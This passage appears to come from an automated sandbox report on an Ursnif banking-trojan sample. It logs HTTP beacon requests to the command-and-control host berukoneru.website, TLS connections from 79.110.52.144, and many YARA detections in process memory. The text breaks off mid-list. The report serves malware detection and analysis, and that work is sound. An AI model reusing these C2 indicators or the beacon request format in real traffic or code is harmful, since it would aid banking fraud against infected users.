          Source: global trafficHTTP traffic detected: GET /tire/KjB2BgkWWh/2R_2Fkj8GC7yaP1kC/DPb_2B003_2B/KSHrvwTkEkd/_2FAMHiah0zctf/nNbEHjkCSlyuZxandMk7W/125Nt4kKNIyzhV_2/FpQlU2nlzM_2FEI/PEryRBP68LWoGHV3sm/y9L4VUWvc/E0UlFXDmQ0_2F2mVHcN_/2B13NnOs91EWboOkL1Q/soeab74L05htIewL3_2FTu/VD2Jph.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: global trafficHTTP traffic detected: GET /tire/m4jBg57LO/F3omyPFCoq2BsJvvqQjq/M_2Frtvqdkes1JW5OTL/BNOx14m03YJ94TjlPw0PZA/GLczTuNVmCYMu/71GtDP5r/ukrg4HqiGfIkYNEYalZxMet/SDWbFyptRt/KM_2FafHnmbZCQsUs/pLVEK0s2DOMd/NxrlfGMBoYt/93NMnwEIHPr7kq/Wl1k8ZjV32EJB93_2FhHV/Qjw6VJUmVv/3MpXPnj1D/cD.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49812 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49813 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49814 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49815 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49816 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49817 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49819 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49820 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49821 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49822 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49823 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49825 version: TLS 1.2

          Key, Mouse, Clipboard, Microphone and Screen Capturing:

          barindex
          Yara detected UrsnifShow sources
          Source: Yara matchFile source: 00000004.00000003.516477194.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.472386293.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.519108386.000000000559D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.518961591.000000000533D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.664429538.000000000533D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.646797077.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000002.672804505.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.517518068.000000000559D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.520102514.000000000385D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.470175062.0000000004F58000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.471268308.0000000005818000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.520620067.000000000385D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.654119494.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.517906088.000000000385D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.494184695.000000000543B000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.656058284.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.470929059.00000000055B8000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.519944178.000000000559D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.654247659.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.665814444.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.668236157.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.665936596.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.647071463.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.493926850.0000000004DDB000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.654303874.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.647295334.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.655646861.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.617274009.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.665894712.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.647415527.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.671422400.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.495487329.000000000395B000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.518696418.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.494405815.000000000569B000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.518133566.000000000533D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.517688433.000000000533D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.654830894.000000000559D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.517563234.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.647561301.000000000385D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.668321842.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 7016, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7056, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7084, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: control.exe PID: 5832, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: control.exe PID: 5952, type: MEMORYSTR

          E-Banking Fraud:

          barindex
          Yara detected UrsnifShow sources
          Source: Yara matchFile source: 00000004.00000003.516477194.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.472386293.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.519108386.000000000559D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.518961591.000000000533D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.664429538.000000000533D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000003.646797077.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002D.00000002.672804505.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.517518068.000000000559D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.520102514.000000000385D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.470175062.0000000004F58000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.471268308.0000000005818000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.520620067.000000000385D000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: